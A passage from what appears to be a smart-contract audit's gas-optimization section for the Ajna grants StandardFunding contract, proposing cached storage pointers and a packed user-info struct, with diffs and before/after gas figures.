+ _hasVoted[msg.sender] = true;
emit VoteCast(
Gas Savings for GrantFund.claimDelegateReward
, obtained via protocol’s tests: Avg 64 gas
Max | |
Before | 65340 |
After | 65276 |
Cache storage pointer for hasClaimedRewards[distributionId_]
File: ajna-grants/src/grants/base/StandardFunding.sol
248: if(hasClaimedReward[distributionId_][msg.sender]) revert RewardAlreadyClaimed();
250: QuadraticVoter memory voter = _quadraticVoters[distributionId_][msg.sender];
252: // calculate rewards earned for voting
253: rewardClaimed_ = _getDelegateReward(currentDistribution, voter);
255: hasClaimedReward[distributionId_][msg.sender] = true;
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..623b47a 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -245,14 +245,15 @@ abstract contract StandardFunding is Funding, IStandardFunding {
if(block.number < _getChallengeStageEndBlock(currentDistribution.endBlock)) revert ChallengePeriodNotEnded();
// check rewards haven't already been claimed
- if(hasClaimedReward[distributionId_][msg.sender]) revert RewardAlreadyClaimed();
+ mapping(address => bool) storage _hasClaimedReward = hasClaimedReward[distributionId_];
+ if(_hasClaimedReward[msg.sender]) revert RewardAlreadyClaimed();
QuadraticVoter memory voter = _quadraticVoters[distributionId_][msg.sender];
// calculate rewards earned for voting
rewardClaimed_ = _getDelegateReward(currentDistribution, voter);
- hasClaimedReward[distributionId_][msg.sender] = true;
+ _hasClaimedReward[msg.sender] = true;
emit DelegateRewardClaimed(
Gas Savings for GrantFund.screeningVote
, obtained via protocol’s tests: Avg 1850 gas
Max | |
Before | 399146 |
After | 397296 |
Cache storage pointer for screeningVotesCast[distributionId]
File: ajna-grants/src/grants/base/StandardFunding.sol
706: if (screeningVotesCast[distributionId][account_] + votes_ > _getVotesScreening(distributionId, account_)) revert InsufficientVotingPower();
743: screeningVotesCast[proposal_.distributionId][account_] += votes_;
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..094a83c 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -703,7 +703,8 @@ abstract contract StandardFunding is Funding, IStandardFunding {
uint24 distributionId = proposal_.distributionId;
// check that the voter has enough voting power to cast the vote
- if (screeningVotesCast[distributionId][account_] + votes_ > _getVotesScreening(distributionId, account_)) revert InsufficientVotingPower();
+ mapping(address => uint256) storage _screeningVotesCast = screeningVotesCast[distributionId];
+ if (_screeningVotesCast[account_] + votes_ > _getVotesScreening(distributionId, account_)) revert InsufficientVotingPower();
uint256[] storage currentTopTenProposals = _topTenProposals[distributionId];
uint256 proposalId = proposal_.proposalId;
@@ -740,7 +741,7 @@ abstract contract StandardFunding is Funding, IStandardFunding {
// record voters vote
- screeningVotesCast[proposal_.distributionId][account_] += votes_;
+ _screeningVotesCast[account_] += votes_;
// emit VoteCast instead of VoteCastWithParams to maintain compatibility with Tally
emit VoteCast(
[G-07] Multiple address mappings can be combined into a single mapping of an address to a struct, where appropriate
We can combine multiple mappings below into structs. We can then pack the structs by modifying the uint type
for the values. This will result in cheaper storage reads since multiple mappings are accessed in functions and those values are now occupying the same storage slot, meaning the slot will become warm after the first SLOAD. In addition, when writing to and reading from the struct values we will avoid a Gsset (20000 gas)
and Gcoldsload (2100 gas)
since multiple struct values are now occupying the same slot.
Note: These are instances missed by the automated report
Gas Savings for GrantFund.claimDelegateReward
, obtained via protocol’s tests: Avg 22146 gas
Max | |
Before | 65340 |
After | 43194 |
File: ajna-grants/src/grants/base/StandardFunding.sol
106: mapping(uint256 => mapping(address => bool)) public hasClaimedReward;
108: /**
109: * @notice Mapping of distributionId to user address to total votes cast on screening stage proposals.
110: * @dev distributionId => address => uint256
111: */
112: mapping(uint256 => mapping(address => uint256)) public screeningVotesCast;
diff --git a/src/grants/base/StandardFunding.sol b/src/grants/base/StandardFunding.sol
index 928b337..9985766 100644
--- a/src/grants/base/StandardFunding.sol
+++ b/src/grants/base/StandardFunding.sol
@@ -99,17 +99,12 @@ abstract contract StandardFunding is Funding, IStandardFunding {
mapping(uint256 => bool) internal _isSurplusFundsUpdated;
- /**
- * @notice Mapping of distributionId to user address to whether user has claimed his delegate reward
- * @dev distributionId => address => bool
- */
- mapping(uint256 => mapping(address => bool)) public hasClaimedReward;
+ struct UserInfo {
+ uint248 screeningVotesCast;
+ bool hasClaimedReward;
+ }
- /**
- * @notice Mapping of distributionId to user address to total votes cast on screening stage proposals.
- * @dev distributionId => address => uint256
- */
- mapping(uint256 => mapping(address => uint256)) public screeningVotesCast;
+ mapping(uint256 => mapping(address => UserInfo)) public userInfo;
/*** Distribution Management Functions External ***/
@@ -237,7 +232,8 @@ abstract contract StandardFunding is Funding, IStandardFunding {
uint24 distributionId_
) external override returns(uint256 rewardClaimed_) {
// Revert if delegatee didn't vote in screening stage
- if(screeningVotesCast[distributionId_][msg.sender] == 0) revert DelegateRewardInvalid();
+ UserInfo storage _userInfo = userInfo[distributionId_][msg.sender];
+ if(_userInfo.screeningVotesCast == 0) revert DelegateRewardInvalid();
QuarterlyDistribution memory currentDistribution = _distributions[distributionId_];
@@ -245,14 +241,14 @@ abstract contract StandardFunding is Funding, IStandardFunding {
if(block.number < _getChallengeStageEndBlock(currentDistribution.endBlock)) revert ChallengePeriodNotEnded();
// check rewards haven't already been claimed
- if(hasClaimedReward[distributionId_][msg.sender]) revert RewardAlreadyClaimed();
+ if(_userInfo.hasClaimedReward) revert RewardAlreadyClaimed();
QuadraticVoter memory voter = _quadraticVoters[distributionId_][msg.sender];
// calculate rewards earned for voting
rewardClaimed_ = _getDelegateReward(currentDistribution, voter);
- hasClaimedReward[distributionId_][msg.sender] = true;
+ _userInfo.hasClaimedReward = true;
emit DelegateRewardClaimed(
@@ -703,7 +699,8 @@ abstract contract StandardFunding is Funding, IStandardFunding {
uint24 distributionId = proposal_.distributionId;
// check that the voter has enough voting power to cast the vote
- if (screeningVotesCast[distributionId][account_] + votes_ > _getVotesScreening(distributionId, account_)) revert InsufficientVotingPower();
+ UserInfo storage _userInfo = userInfo[distributionId][account_];
+ if (_userInfo.screeningVotesCast + votes_ > _getVotesScreening(distributionId, account_)) revert InsufficientVotingPower();
uint256[] storage currentTopTenProposals = _topTenProposals[distributionId];
uint256 proposalId = proposal_.proposalId;
@@ -740,7 +737,7 @@ abstract contract StandardFunding is Funding, IStandardFunding {
// record voters vote
- screeningVotesCast[proposal_.distributionId][account_] += votes_;
+ _userInfo.screeningVotesCast += uint248(votes_);
// emit VoteCast instead of VoteCastWithParams to maintain compatibility with Tally
emit VoteCast(
Please note that in the automated report the poolKey
mapping was not included in the findings.